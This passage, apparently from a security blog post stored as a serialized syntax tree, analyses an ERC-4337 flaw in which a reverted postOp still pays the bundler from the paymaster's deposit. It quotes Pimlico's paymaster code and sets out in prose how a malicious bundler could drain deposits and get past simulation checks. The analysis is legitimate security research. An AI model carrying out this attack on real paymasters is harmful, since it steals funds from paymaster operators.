mUserOp.paymasterPostOpGasLimit\n",{"type":26,"tag":137,"props":109164,"children":109165},{"class":5559,"line":6279},[109166],{"type":26,"tag":137,"props":109167,"children":109168},{"style":5601},[109169],{"type":32,"value":109170},"                            }(mode, context, actualGasCost, gasPrice)\n",{"type":26,"tag":137,"props":109172,"children":109173},{"class":5559,"line":6288},[109174,109179,109184],{"type":26,"tag":137,"props":109175,"children":109176},{"style":5564},[109177],{"type":32,"value":109178},"                        // ",{"type":26,"tag":137,"props":109180,"children":109181},{"style":5573},[109182],{"type":32,"value":109183},"solhint-disable",{"type":26,"tag":137,"props":109185,"children":109186},{"style":5564},[109187],{"type":32,"value":109188},"-next-line no-empty-blocks\n",{"type":26,"tag":137,"props":109190,"children":109191},{"class":5559,"line":6355},[109192,109197,109201],{"type":26,"tag":137,"props":109193,"children":109194},{"style":5601},[109195],{"type":32,"value":109196},"                        {} ",{"type":26,"tag":137,"props":109198,"children":109199},{"style":5610},[109200],{"type":32,"value":51013},{"type":26,"tag":137,"props":109202,"children":109203},{"style":5601},[109204],{"type":32,"value":5875},{"type":26,"tag":137,"props":109206,"children":109207},{"class":5559,"line":6363},[109208,109213,109217,109222,109226,109230,109234],{"type":26,"tag":137,"props":109209,"children":109210},{"style":6009},[109211],{"type":32,"value":109212},"                            bytes",{"type":26,"tag":137,"props":109214,"children":109215},{"style":5573},[109216],{"type":32,"value":105661},{"type":26,"tag":137,"props":109218,"children":109219},{"style":5601},[109220],{"type":32,"value":109221}," reason ",{"type":26,"tag":137,"props":109223,"children":109224},{"style":5590},[109225],{"type":32,"value":289},{"type":26,"tag":137,"props":109227,"children":109228},{"style":5601},[109229],{"type":32,"value":108431},{"type":26,"tag":137,"props":109231,"children":109232},{"style":5682},[109233],{"type":32,"value":108522},{"type":26,"tag":137,"props":109235,"children":109236},{"style":5601},[109237],{"type":32,"value":108527},{"type":26,"tag":137,"props":109239,"children":109240},{"class":5559,"line":6393},[109241,109246,109251],{"type":26,"tag":137,"props":109242,"children":109243},{"style":5610},[109244],{"type":32,"value":109245},"                            revert",{"type":26,"tag":137,"props":109247,"children":109248},{"style":5682},[109249],{"type":32,"value":109250}," PostOpReverted",{"type":26,"tag":137,"props":109252,"children":109253},{"style":5601},[109254],{"type":32,"value":109255},"(reason);\n",{"type":26,"tag":137,"props":109257,"children":109258},{"class":5559,"line":6401},[109259],{"type":26,"tag":137,"props":109260,"children":109261},{"style":5601},[109262],{"type":32,"value":73579},{"type":26,"tag":137,"props":109264,"children":109265},{"class":5559,"line":6433},[109266],{"type":26,"tag":137,"props":109267,"children":109268},{"style":5601},[109269],{"type":32,"value":73664},{"type":26,"tag":137,"props":109271,"children":109272},{"class":5559,"line":6441},[109273],{"type":26,"tag":137,"props":109274,"children":109275},{"style":5564},[109276],{"type":32,"value":109277},"                    // Calculating a penalty for unused postOp gas\n",{"type":26,"tag":137,"props":109279,"children":109280},{"class":5559,"line":6501},[109281,109285,109289],{"type":26,"tag":137,"props":109282,"children":109283},{"style":5564},[109284],{"type":32,"value":106123},{"type":26,"tag":137,"props":109286,"children":109287},{"style":5573},[109288],{"type":32,"value":69360},{"type":26,"tag":137,"props":109290,"children":109291},{"style":5564},[109292],{"type":32,"value":109293}," that if postOp is reverted, the maximum penalty (10% of postOpGasLimit) is charged.\n",{"type":26,"tag":137,"props":109295,"children":109296},{"class":5559,"line":11634},[109297,109301,109306,109310,109314,109318,109322],{"type":26,"tag":137,"props":109298,"children":109299},{"style":6009},[109300],{"type":32,"value":106058},{"type":26,"tag":137,"props":109302,"children":109303},{"style":5601},[109304],{"type":32,"value":109305}," postOpGasUsed ",{"type":26,"tag":137,"props":109307,"children":109308},{"style":5590},[109309],{"type":32,"value":289},{"type":26,"tag":137,"props":109311,"children":109312},{"style":5601},[109313],{"type":32,"value":109093},{"type":26,"tag":137,"props":109315,"children":109316},{"style":5590},[109317],{"type":32,"value":6908},{"type":26,"tag":137,"props":109319,"children":109320},{"style":5573},[109321],{"type":32,"value":107890},{"type":26,"tag":137,"props":109323,"children":109324},{"style":5601},[109325],{"type":32,"value":6267},{"type":26,"tag":137,"props":109327,"children":109328},{"class":5559,"line":11652},[109329,109334,109338,109343],{"type":26,"tag":137,"props":109330,"children":109331},{"style":5601},[109332],{"type":32,"value":109333},"                    postOpUnusedGasPenalty ",{"type":26,"tag":137,"props":109335,"children":109336},{"style":5590},[109337],{"type":32,"value":289},{"type":26,"tag":137,"props":109339,"children":109340},{"style":5682},[109341],{"type":32,"value":109342}," _getUnusedGasPenalty",{"type":26,"tag":137,"props":109344,"children":109345},{"style":5601},[109346],{"type":32,"value":109347},"(postOpGasUsed, mUserOp.paymasterPostOpGasLimit);\n",{"type":26,"tag":137,"props":109349,"children":109350},{"class":5559,"line":11697},[109351],{"type":26,"tag":137,"props":109352,"children":109353},{"style":5601},[109354],{"type":32,"value":73672},{"type":26,"tag":137,"props":109356,"children":109357},{"class":5559,"line":11803},[109358],{"type":26,"tag":137,"props":109359,"children":109360},{"style":5601},[109361],{"type":32,"value":61486},{"type":26,"tag":137,"props":109363,"children":109364},{"class":5559,"line":26089},[109365],{"type":26,"tag":137,"props":109366,"children":109367},{"style":5601},[109368],{"type":32,"value":107381},{"type":26,"tag":137,"props":109370,"children":109371},{"class":5559,"line":26124},[109372],{"type":26,"tag":137,"props":109373,"children":109374},{"style":5601},[109375],{"type":32,"value":5945},{"type":26,"tag":35,"props":109377,"children":109378},{},[109379,109381,109386,109388,109394,109396,109402,109404,109409,109411,109416,109418,109423,109425,109430,109432,109437,109439,109444],{"type":32,"value":109380},"It turns out that if the ",{"type":26,"tag":130,"props":109382,"children":109384},{"className":109383},[],[109385],{"type":32,"value":104962},{"type":32,"value":109387}," call fails, it will revert with ",{"type":26,"tag":130,"props":109389,"children":109391},{"className":109390},[],[109392],{"type":32,"value":109393},"PostOpReverted",{"type":32,"value":109395},". However, as we can see in the previous code of ",{"type":26,"tag":130,"props":109397,"children":109399},{"className":109398},[],[109400],{"type":32,"value":109401},"_executeUserOp",{"type":32,"value":109403},", even though ",{"type":26,"tag":130,"props":109405,"children":109407},{"className":109406},[],[109408],{"type":32,"value":108103},{"type":32,"value":109410}," fails, the execution won't revert. Instead, it will continue to make another ",{"type":26,"tag":130,"props":109412,"children":109414},{"className":109413},[],[109415],{"type":32,"value":108771},{"type":32,"value":109417}," call with ",{"type":26,"tag":130,"props":109419,"children":109421},{"className":109420},[],[109422],{"type":32,"value":108779},{"type":32,"value":109424}," mode, and it won't try to call ",{"type":26,"tag":130,"props":109426,"children":109428},{"className":109427},[],[109429],{"type":32,"value":104962},{"type":32,"value":109431}," again. This means the ",{"type":26,"tag":130,"props":109433,"children":109435},{"className":109434},[],[109436],{"type":32,"value":104823},{"type":32,"value":109438}," still gets paid for submitting the failed ",{"type":26,"tag":130,"props":109440,"children":109442},{"className":109441},[],[109443],{"type":32,"value":104763},{"type":32,"value":470},{"type":26,"tag":35,"props":109446,"children":109447},{},[109448,109450,109455,109457,109462,109464,109471],{"type":32,"value":109449},"Now that we understand this behavior where ",{"type":26,"tag":130,"props":109451,"children":109453},{"className":109452},[],[109454],{"type":32,"value":104962},{"type":32,"value":109456}," is allowed to fail while the ",{"type":26,"tag":130,"props":109458,"children":109460},{"className":109459},[],[109461],{"type":32,"value":104823},{"type":32,"value":109463}," still gets paid, let's examine a real-world example from the most widely used paymaster currently, which is the paymaster implemented by ",{"type":26,"tag":41,"props":109465,"children":109468},{"href":109466,"rel":109467},"https://github.com/pimlicolabs/singleton-paymaster/blob/feat/v8/src/SingletonPaymasterV7.sol",[45],[109469],{"type":32,"value":109470},"Pimlico",{"type":32,"value":470},{"type":26,"tag":5512,"props":109473,"children":109475},{"className":7055,"code":109474,"language":7054,"meta":7,"style":7},"    function _postOp(\n        PostOpMode, /* mode */\n        bytes calldata _context,\n        uint256 _actualGasCost,\n        uint256 _actualUserOpFeePerGas\n    )\n        internal\n    {\n        ERC20PostOpContext memory ctx = _parsePostOpContext(_context);\n\n        uint256 expectedPenaltyGasCost = _expectedPenaltyGasCost(\n            _actualGasCost, _actualUserOpFeePerGas, ctx.postOpGas, ctx.preOpGasApproximation, ctx.executionGasLimit\n        );\n\n        uint256 actualGasCost = _actualGasCost + expectedPenaltyGasCost;\n\n        uint256 costInToken =\n            getCostInToken(actualGasCost, ctx.postOpGas, _actualUserOpFeePerGas, ctx.exchangeRate) + ctx.constantFee;\n\n        uint256 absoluteCostInToken =\n            costInToken > ctx.preFundCharged ? costInToken - ctx.preFundCharged : ctx.preFundCharged - costInToken;\n\n        SafeTransferLib.safeTransferFrom(\n            ctx.token,\n            costInToken > ctx.preFundCharged ? ctx.sender : ctx.treasury,\n            costInToken > ctx.preFundCharged ? ctx.treasury : ctx.sender,\n            absoluteCostInToken\n        );\n\n        uint256 preFundInToken = (ctx.preFund * ctx.exchangeRate) / 1e18;\n\n        if (ctx.recipient != address(0) && preFundInToken > costInToken) {\n            SafeTransferLib.safeTransferFrom(ctx.token, ctx.sender, ctx.recipient, preFundInToken - costInToken);\n        }\n\n        emit UserOperationSponsored(ctx.userOpHash, ctx.sender, ERC20_MODE, ctx.token, costInToken, ctx.exchangeRate);\n    }\n",[109476],{"type":26,"tag":130,"props":109477,"children":109478},{"__ignoreMap":7},[109479,109494,109511,109531,109547,109559,109566,109573,109580,109611,109618,109643,109651,109658,109665,109694,109701,109717,109739,109746,109762,109812,109819,109835,109843,109876,109909,109917,109924,109931,109974,109981,110030,110056,110063,110070,110087],{"type":26,"tag":137,"props":109480,"children":109481},{"class":5559,"line":5560},[109482,109486,109490],{"type":26,"tag":137,"props":109483,"children":109484},{"style":5573},[109485],{"type":32,"value":92433},{"type":26,"tag":137,"props":109487,"children":109488},{"style":5682},[109489],{"type":32,"value":106364},{"type":26,"tag":137,"props":109491,"children":109492},{"style":5601},[109493],{"type":32,"value":6054},{"type":26,"tag":137,"props":109495,"children":109496},{"class":5559,"line":5412},[109497,109502,109506],{"type":26,"tag":137,"props":109498,"children":109499},{"style":5573},[109500],{"type":32,"value":109501},"        PostOpMode",{"type":26,"tag":137,"props":109503,"children":109504},{"style":5601},[109505],{"type":32,"value":1108},{"type":26,"tag":137,"props":109507,"children":109508},{"style":5564},[109509],{"type":32,"value":109510},"/* mode */\n",{"type":26,"tag":137,"props":109512,"children":109513},{"class":5559,"line":5417},[109514,109518,109522,109527],{"type":26,"tag":137,"props":109515,"children":109516},{"style":6009},[109517],{"type":32,"value":108279},{"type":26,"tag":137,"props":109519,"children":109520},{"style":5573},[109521],{"type":32,"value":105593},{"type":26,"tag":137,"props":109523,"children":109524},{"style":5584},[109525],{"type":32,"value":109526}," _context",{"type":26,"tag":137,"props":109528,"children":109529},{"style":5601},[109530],{"type":32,"value":6099},{"type":26,"tag":137,"props":109532,"children":109533},{"class":5559,"line":5642},[109534,109538,109543],{"type":26,"tag":137,"props":109535,"children":109536},{"style":6009},[109537],{"type":32,"value":92611},{"type":26,"tag":137,"props":109539,"children":109540},{"style":5584},[109541],{"type":32,"value":109542}," _actualGasCost",{"type":26,"tag":137,"props":109544,"children":109545},{"style":5601},[109546],{"type":32,"value":6099},{"type":26,"tag":137,"props":109548,"children":109549},{"class":5559,"line":5745},[109550,109554],{"type":26,"tag":137,"props":109551,"children":109552},{"style":6009},[109553],{"type":32,"value":92611},{"type":26,"tag":137,"props":109555,"children":109556},{"style":5584},[109557],{"type":32,"value":109558}," _actualUserOpFeePerGas\n",{"type":26,"tag":137,"props":109560,"children":109561},{"class":5559,"line":5850},[109562],{"type":26,"tag":137,"props":109563,"children":109564},{"style":5601},[109565],{"type":32,"value":26510},{"type":26,"tag":137,"props":109567,"children":109568},{"class":5559,"line":5878},[109569],{"type":26,"tag":137,"props":109570,"children":109571},{"style":5573},[109572],{"type":32,"value":105632},{"type":26,"tag":137,"props":109574,"children":109575},{"class":5559,"line":5891},[109576],{"type":26,"tag":137,"props":109577,"children":109578},{"style":5601},[109579],{"type":32,"value":31781},{"type":26,"tag":137,"props":109581,"children":109582},{"class":5559,"line":5909},[109583,109588,109592,109597,109601,109606],{"type":26,"tag":137,"props":109584,"children":109585},{"style":5601},[109586],{"type":32,"value":109587},"        ERC20PostOpContext ",{"type":26,"tag":137,"props":109589,"children":109590},{"style":5573},[109591],{"type":32,"value":78575},{"type":26,"tag":137,"props":109593,"children":109594},{"style":5601},[109595],{"type":32,"value":109596}," ctx ",{"type":26,"tag":137,"props":109598,"children":109599},{"style":5590},[109600],{"type":32,"value":289},{"type":26,"tag":137,"props":109602,"children":109603},{"style":5682},[109604],{"type":32,"value":109605}," _parsePostOpContext",{"type":26,"tag":137,"props":109607,"children":109608},{"style":5601},[109609],{"type":32,"value":109610},"(_context);\n",{"type":26,"tag":137,"props":109612,"children":109613},{"class":5559,"line":5930},[109614],{"type":26,"tag":137,"props":109615,"children":109616},{"emptyLinePlaceholder":18},[109617],{"type":32,"value":6276},{"type":26,"tag":137,"props":109619,"children":109620},{"class":5559,"line":5939},[109621,109625,109630,109634,109639],{"type":26,"tag":137,"props":109622,"children":109623},{"style":6009},[109624],{"type":32,"value":92611},{"type":26,"tag":137,"props":109626,"children":109627},{"style":5601},[109628],{"type":32,"value":109629}," expectedPenaltyGasCost ",{"type":26,"tag":137,"props":109631,"children":109632},{"style":5590},[109633],{"type":32,"value":289},{"type":26,"tag":137,"props":109635,"children":109636},{"style":5682},[109637],{"type":32,"value":109638}," _expectedPenaltyGasCost",{"type":26,"tag":137,"props":109640,"children":109641},{"style":5601},[109642],{"type":32,"value":6054},{"type":26,"tag":137,"props":109644,"children":109645},{"class":5559,"line":6191},[109646],{"type":26,"tag":137,"props":109647,"children":109648},{"style":5601},[109649],{"type":32,"value":109650},"            _actualGasCost, _actualUserOpFeePerGas, ctx.postOpGas, ctx.preOpGasApproximation, ctx.executionGasLimit\n",{"type":26,"tag":137,"props":109652,"children":109653},{"class":5559,"line":6208},[109654],{"type":26,"tag":137,"props":109655,"children":109656},{"style":5601},[109657],{"type":32,"value":10328},{"type":26,"tag":137,"props":109659,"children":109660},{"class":5559,"line":6225},[109661],{"type":26,"tag":137,"props":109662,"children":109663},{"emptyLinePlaceholder":18},[109664],{"type":32,"value":6276},{"type":26,"tag":137,"props":109666,"children":109667},{"class":5559,"line":6238},[109668,109672,109676,109680,109685,109689],{"type":26,"tag":137,"props":109669,"children":109670},{"style":6009},[109671],{"type":32,"value":92611},{"type":26,"tag":137,"props":109673,"children":109674},{"style":5601},[109675],{"type":32,"value":106688},{"type":26,"tag":137,"props":109677,"children":109678},{"style":5590},[109679],{"type":32,"value":289},{"type":26,"tag":137,"props":109681,"children":109682},{"style":5601},[109683],{"type":32,"value":109684}," _actualGasCost ",{"type":26,"tag":137,"props":109686,"children":109687},{"style":5590},[109688],{"type":32,"value":356},{"type":26,"tag":137,"props":109690,"children":109691},{"style":5601},[109692],{"type":32,"value":109693}," expectedPenaltyGasCost;\n",{"type":26,"tag":137,"props":109695,"children":109696},{"class":5559,"line":6247},[109697],{"type":26,"tag":137,"props":109698,"children":109699},{"emptyLinePlaceholder":18},[109700],{"type":32,"value":6276},{"type":26,"tag":137,"props":109702,"children":109703},{"class":5559,"line":6270},[109704,109708,109713],{"type":26,"tag":137,"props":109705,"children":109706},{"style":6009},[109707],{"type":32,"value":92611},{"type":26,"tag":137,"props":109709,"children":109710},{"style":5601},[109711],{"type":32,"value":109712}," costInToken ",{"type":26,"tag":137,"props":109714,"children":109715},{"style":5590},[109716],{"type":32,"value":17284},{"type":26,"tag":137,"props":109718,"children":109719},{"class":5559,"line":6279},[109720,109725,109730,109734],{"type":26,"tag":137,"props":109721,"children":109722},{"style":5682},[109723],{"type":32,"value":109724},"            getCostInToken",{"type":26,"tag":137,"props":109726,"children":109727},{"style":5601},[109728],{"type":32,"value":109729},"(actualGasCost, ctx.postOpGas, _actualUserOpFeePerGas, ctx.exchangeRate) ",{"type":26,"tag":137,"props":109731,"children":109732},{"style":5590},[109733],{"type":32,"value":356},{"type":26,"tag":137,"props":109735,"children":109736},{"style":5601},[109737],{"type":32,"value":109738}," ctx.constantFee;\n",{"type":26,"tag":137,"props":109740,"children":109741},{"class":5559,"line":6288},[109742],{"type":26,"tag":137,"props":109743,"children":109744},{"emptyLinePlaceholder":18},[109745],{"type":32,"value":6276},{"type":26,"tag":137,"props":109747,"children":109748},{"class":5559,"line":6355},[109749,109753,109758],{"type":26,"tag":137,"props":109750,"children":109751},{"style":6009},[109752],{"type":32,"value":92611},{"type":26,"tag":137,"props":109754,"children":109755},{"style":5601},[109756],{"type":32,"value":109757}," absoluteCostInToken ",{"type":26,"tag":137,"props":109759,"children":109760},{"style":5590},[109761],{"type":32,"value":17284},{"type":26,"tag":137,"props":109763,"children":109764},{"class":5559,"line":6363},[109765,109770,109774,109779,109783,109787,109791,109795,109799,109803,109807],{"type":26,"tag":137,"props":109766,"children":109767},{"style":5601},[109768],{"type":32,"value":109769},"            costInToken ",{"type":26,"tag":137,"props":109771,"children":109772},{"style":5590},[109773],{"type":32,"value":13052},{"type":26,"tag":137,"props":109775,"children":109776},{"style":5601},[109777],{"type":32,"value":109778}," ctx.preFundCharged ",{"type":26,"tag":137,"props":109780,"children":109781},{"style":5590},[109782],{"type":32,"value":5737},{"type":26,"tag":137,"props":109784,"children":109785},{"style":5601},[109786],{"type":32,"value":109712},{"type":26,"tag":137,"props":109788,"children":109789},{"style":5590},[109790],{"type":32,"value":6908},{"type":26,"tag":137,"props":109792,"children":109793},{"style":5601},[109794],{"type":32,"value":109778},{"type":26,"tag":137,"props":109796,"children":109797},{"style":5590},[109798],{"type":32,"value":7072},{"type":26,"tag":137,"props":109800,"children":109801},{"style":5601},[109802],{"type":32,"value":109778},{"type":26,"tag":137,"props":109804,"children":109805},{"style":5590},[109806],{"type":32,"value":6908},{"type":26,"tag":137,"props":109808,"children":109809},{"style":5601},[109810],{"type":32,"value":109811}," costInToken;\n",{"type":26,"tag":137,"props":109813,"children":109814},{"class":5559,"line":6393},[109815],{"type":26,"tag":137,"props":109816,"children":109817},{"emptyLinePlaceholder":18},[109818],{"type":32,"value":6276},{"type":26,"tag":137,"props":109820,"children":109821},{"class":5559,"line":6401},[109822,109827,109831],{"type":26,"tag":137,"props":109823,"children":109824},{"style":5601},[109825],{"type":32,"value":109826},"        SafeTransferLib.",{"type":26,"tag":137,"props":109828,"children":109829},{"style":5682},[109830],{"type":32,"value":106219},{"type":26,"tag":137,"props":109832,"children":109833},{"style":5601},[109834],{"type":32,"value":6054},{"type":26,"tag":137,"props":109836,"children":109837},{"class":5559,"line":6433},[109838],{"type":26,"tag":137,"props":109839,"children":109840},{"style":5601},[109841],{"type":32,"value":109842},"            ctx.token,\n",{"type":26,"tag":137,"props":109844,"children":109845},{"class":5559,"line":6441},[109846,109850,109854,109858,109862,109867,109871],{"type":26,"tag":137,"props":109847,"children":109848},{"style":5601},[109849],{"type":32,"value":109769},{"type":26,"tag":137,"props":109851,"children":109852},{"style":5590},[109853],{"type":32,"value":13052},{"type":26,"tag":137,"props":109855,"children":109856},{"style":5601},[109857],{"type":32,"value":109778},{"type":26,"tag":137,"props":109859,"children":109860},{"style":5590},[109861],{"type":32,"value":5737},{"type":26,"tag":137,"props":109863,"children":109864},{"style":5601},[109865],{"type":32,"value":109866}," ctx.sender ",{"type":26,"tag":137,"props":109868,"children":109869},{"style":5590},[109870],{"type":32,"value":7072},{"type":26,"tag":137,"props":109872,"children":109873},{"style":5601},[109874],{"type":32,"value":109875}," ctx.treasury,\n",{"type":26,"tag":137,"props":109877,"children":109878},{"class":5559,"line":6501},[109879,109883,109887,109891,109895,109900,109904],{"type":26,"tag":137,"props":109880,"children":109881},{"style":5601},[109882],{"type":32,"value":109769},{"type":26,"tag":137,"props":109884,"children":109885},{"style":5590},[109886],{"type":32,"value":13052},{"type":26,"tag":137,"props":109888,"children":109889},{"style":5601},[109890],{"type":32,"value":109778},{"type":26,"tag":137,"props":109892,"children":109893},{"style":5590},[109894],{"type":32,"value":5737},{"type":26,"tag":137,"props":109896,"children":109897},{"style":5601},[109898],{"type":32,"value":109899}," ctx.treasury ",{"type":26,"tag":137,"props":109901,"children":109902},{"style":5590},[109903],{"type":32,"value":7072},{"type":26,"tag":137,"props":109905,"children":109906},{"style":5601},[109907],{"type":32,"value":109908}," ctx.sender,\n",{"type":26,"tag":137,"props":109910,"children":109911},{"class":5559,"line":11634},[109912],{"type":26,"tag":137,"props":109913,"children":109914},{"style":5601},[109915],{"type":32,"value":109916},"            absoluteCostInToken\n",{"type":26,"tag":137,"props":109918,"children":109919},{"class":5559,"line":11652},[109920],{"type":26,"tag":137,"props":109921,"children":109922},{"style":5601},[109923],{"type":32,"value":10328},{"type":26,"tag":137,"props":109925,"children":109926},{"class":5559,"line":11697},[109927],{"type":26,"tag":137,"props":109928,"children":109929},{"emptyLinePlaceholder":18},[109930],{"type":32,"value":6276},{"type":26,"tag":137,"props":109932,"children":109933},{"class":5559,"line":11803},[109934,109938,109943,109947,109952,109956,109961,109965,109970],{"type":26,"tag":137,"props":109935,"children":109936},{"style":6009},[109937],{"type":32,"value":92611},{"type":26,"tag":137,"props":109939,"children":109940},{"style":5601},[109941],{"type":32,"value":109942}," preFundInToken ",{"type":26,"tag":137,"props":109944,"children":109945},{"style":5590},[109946],{"type":32,"value":289},{"type":26,"tag":137,"props":109948,"children":109949},{"style":5601},[109950],{"type":32,"value":109951}," (ctx.preFund ",{"type":26,"tag":137,"props":109953,"children":109954},{"style":5590},[109955],{"type":32,"value":7152},{"type":26,"tag":137,"props":109957,"children":109958},{"style":5601},[109959],{"type":32,"value":109960}," ctx.exchangeRate) ",{"type":26,"tag":137,"props":109962,"children":109963},{"style":5590},[109964],{"type":32,"value":7162},{"type":26,"tag":137,"props":109966,"children":109967},{"style":5626},[109968],{"type":32,"value":109969}," 1e18",{"type":26,"tag":137,"props":109971,"children":109972},{"style":5601},[109973],{"type":32,"value":5604},{"type":26,"tag":137,"props":109975,"children":109976},{"class":5559,"line":26089},[109977],{"type":26,"tag":137,"props":109978,"children":109979},{"emptyLinePlaceholder":18},[109980],{"type":32,"value":6276},{"type":26,"tag":137,"props":109982,"children":109983},{"class":5559,"line":26124},[109984,109988,109993,109997,110001,110005,110009,110013,110017,110021,110025],{"type":26,"tag":137,"props":109985,"children":109986},{"style":5610},[109987],{"type":32,"value":5856},{"type":26,"tag":137,"props":109989,"children":109990},{"style":5601},[109991],{"type":32,"value":109992}," (ctx.recipient ",{"type":26,"tag":137,"props":109994,"children":109995},{"style":5590},[109996],{"type":32,"value":18280},{"type":26,"tag":137,"props":109998,"children":109999},{"style":6009},[110000],{"type":32,"value":8835},{"type":26,"tag":137,"props":110002,"children":110003},{"style":5601},[110004],{"type":32,"value":165},{"type":26,"tag":137,"props":110006,"children":110007},{"style":5626},[110008],{"type":32,"value":1817},{"type":26,"tag":137,"props":110010,"children":110011},{"style":5601},[110012],{"type":32,"value":5671},{"type":26,"tag":137,"props":110014,"children":110015},{"style":5590},[110016],{"type":32,"value":75798},{"type":26,"tag":137,"props":110018,"children":110019},{"style":5601},[110020],{"type":32,"value":109942},{"type":26,"tag":137,"props":110022,"children":110023},{"style":5590},[110024],{"type":32,"value":13052},{"type":26,"tag":137,"props":110026,"children":110027},{"style":5601},[110028],{"type":32,"value":110029}," costInToken) {\n",{"type":26,"tag":137,"props":110031,"children":110032},{"class":5559,"line":26132},[110033,110038,110042,110047,110051],{"type":26,"tag":137,"props":110034,"children":110035},{"style":5601},[110036],{"type":32,"value":110037},"            SafeTransferLib.",{"type":26,"tag":137,"props":110039,"children":110040},{"style":5682},[110041],{"type":32,"value":106219},{"type":26,"tag":137,"props":110043,"children":110044},{"style":5601},[110045],{"type":32,"value":110046},"(ctx.token, ctx.sender, ctx.recipient, preFundInToken ",{"type":26,"tag":137,"props":110048,"children":110049},{"style":5590},[110050],{"type":32,"value":6908},{"type":26,"tag":137,"props":110052,"children":110053},{"style":5601},[110054],{"type":32,"value":110055}," costInToken);\n",{"type":26,"tag":137,"props":110057,"children":110058},{"class":5559,"line":26140},[110059],{"type":26,"tag":137,"props":110060,"children":110061},{"style":5601},[110062],{"type":32,"value":5936},{"type":26,"tag":137,"props":110064,"children":110065},{"class":5559,"line":26149},[110066],{"type":26,"tag":137,"props":110067,"children":110068},{"emptyLinePlaceholder":18},[110069],{"type":32,"value":6276},{"type":26,"tag":137,"props":110071,"children":110072},{"class":5559,"line":26191},[110073,110078,110082],{"type":26,"tag":137,"props":110074,"children":110075},{"style":5610},[110076],{"type":32,"value":110077},"        emit",{"type":26,"tag":137,"props":110079,"children":110080},{"style":5682},[110081],{"type":32,"value":106953},{"type":26,"tag":137,"props":110083,"children":110084},{"style":5601},[110085],{"type":32,"value":110086},"(ctx.userOpHash, ctx.sender, ERC20_MODE, ctx.token, costInToken, ctx.exchangeRate);\n",{"type":26,"tag":137,"props":110088,"children":110089},{"class":5559,"line":26224},[110090],{"type":26,"tag":137,"props":110091,"children":110092},{"style":5601},[110093],{"type":32,"value":5945},{"type":26,"tag":35,"props":110095,"children":110096},{},[110097,110099,110104,110106,110112,110114,110120,110122,110127,110129,110134],{"type":32,"value":110098},"As shown above, the paymaster calculates the actual gas used and attempts to charge the user by calling ",{"type":26,"tag":130,"props":110100,"children":110102},{"className":110101},[],[110103],{"type":32,"value":106219},{"type":32,"value":110105},". Note that ",{"type":26,"tag":130,"props":110107,"children":110109},{"className":110108},[],[110110],{"type":32,"value":110111},"preFundCharged",{"type":32,"value":110113}," can be zero, as users can opt out of any ",{"type":26,"tag":130,"props":110115,"children":110117},{"className":110116},[],[110118],{"type":32,"value":110119},"preFund",{"type":32,"value":110121}," during the validation phase. If the user hasn't given sufficient allowance to Pimlico's paymaster for the transfer, the ",{"type":26,"tag":130,"props":110123,"children":110125},{"className":110124},[],[110126],{"type":32,"value":107020},{"type":32,"value":110128}," call inside ",{"type":26,"tag":130,"props":110130,"children":110132},{"className":110131},[],[110133],{"type":32,"value":108103},{"type":32,"value":110135}," will revert and the paymaster won't be able to collect payment from the user.",{"type":26,"tag":35,"props":110137,"children":110138},{},[110139,110141,110146,110148,110154,110156,110162],{"type":32,"value":110140},"However, even when ",{"type":26,"tag":130,"props":110142,"children":110144},{"className":110143},[],[110145],{"type":32,"value":107020},{"type":32,"value":110147}," fails, the EntryPoint will still complete the execution and pay the bundler who submitted it. Importantly, this payment comes from the paymaster's deposit, since during validation the ",{"type":26,"tag":130,"props":110149,"children":110151},{"className":110150},[],[110152],{"type":32,"value":110153},"requiredPrefund",{"type":32,"value":110155}," was taken from the paymaster's ",{"type":26,"tag":41,"props":110157,"children":110160},{"href":110158,"rel":110159},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L625-L627",[45],[110161],{"type":32,"value":3846},{"type":32,"value":470},{"type":26,"tag":35,"props":110164,"children":110165},{},[110166,110168,110173],{"type":32,"value":110167},"This creates a critical vulnerability for paymasters that implement post-execution charging patterns. Even if the ",{"type":26,"tag":130,"props":110169,"children":110171},{"className":110170},[],[110172],{"type":32,"value":107020},{"type":32,"value":110174}," call fails (meaning the paymaster couldn't collect payment from the user), the paymaster still has to pay the bundler's gas costs from their deposited funds. This vulnerability can be exploited by malicious bundlers in the following way:",{"type":26,"tag":4820,"props":110176,"children":110177},{},[110178,110196,110215,110226,110231],{"type":26,"tag":3430,"props":110179,"children":110180},{},[110181,110183,110188,110190],{"type":32,"value":110182},"The bundler creates a ",{"type":26,"tag":130,"props":110184,"children":110186},{"className":110185},[],[110187],{"type":32,"value":104763},{"type":32,"value":110189}," with an intentionally high ",{"type":26,"tag":130,"props":110191,"children":110193},{"className":110192},[],[110194],{"type":32,"value":110195},"gasPrice",{"type":26,"tag":3430,"props":110197,"children":110198},{},[110199,110201,110206,110208,110213],{"type":32,"value":110200},"The bundler ensures the ",{"type":26,"tag":130,"props":110202,"children":110204},{"className":110203},[],[110205],{"type":32,"value":107020},{"type":32,"value":110207}," call will fail by revoking the paymaster's token allowance before ",{"type":26,"tag":130,"props":110209,"children":110211},{"className":110210},[],[110212],{"type":32,"value":107020},{"type":32,"value":110214}," executes",{"type":26,"tag":3430,"props":110216,"children":110217},{},[110218,110219,110224],{"type":32,"value":65955},{"type":26,"tag":130,"props":110220,"children":110222},{"className":110221},[],[110223],{"type":32,"value":107020},{"type":32,"value":110225}," fails, the bundler still gets paid their high gas costs by the paymaster",{"type":26,"tag":3430,"props":110227,"children":110228},{},[110229],{"type":32,"value":110230},"The paymaster loses money since they paid the bundler but couldn't collect from the user",{"type":26,"tag":3430,"props":110232,"children":110233},{},[110234],{"type":32,"value":110235},"The bundler profits as long as their actual gas costs are less than what they charged",{"type":26,"tag":35,"props":110237,"children":110238},{},[110239,110241,110246,110248,110253],{"type":32,"value":110240},"This effectively allows bundlers to drain paymaster deposits by submitting ",{"type":26,"tag":130,"props":110242,"children":110244},{"className":110243},[],[110245],{"type":32,"value":104792},{"type":32,"value":110247}," designed to fail during ",{"type":26,"tag":130,"props":110249,"children":110251},{"className":110250},[],[110252],{"type":32,"value":107020},{"type":32,"value":110254}," while maximizing the gas costs they can charge to the paymaster.",{"type":26,"tag":35,"props":110256,"children":110257},{},[110258,110260,110265,110267,110272,110274,110280,110282,110287],{"type":32,"value":110259},"Some paymasters try to protect against this by simulating the ",{"type":26,"tag":130,"props":110261,"children":110263},{"className":110262},[],[110264],{"type":32,"value":104763},{"type":32,"value":110266}," execution before signing and allowing it to be submitted. However, this protection can be easily bypassed because an attacker can simply approve the required token allowance during simulation to pass validation, but then revoke the allowance just before the 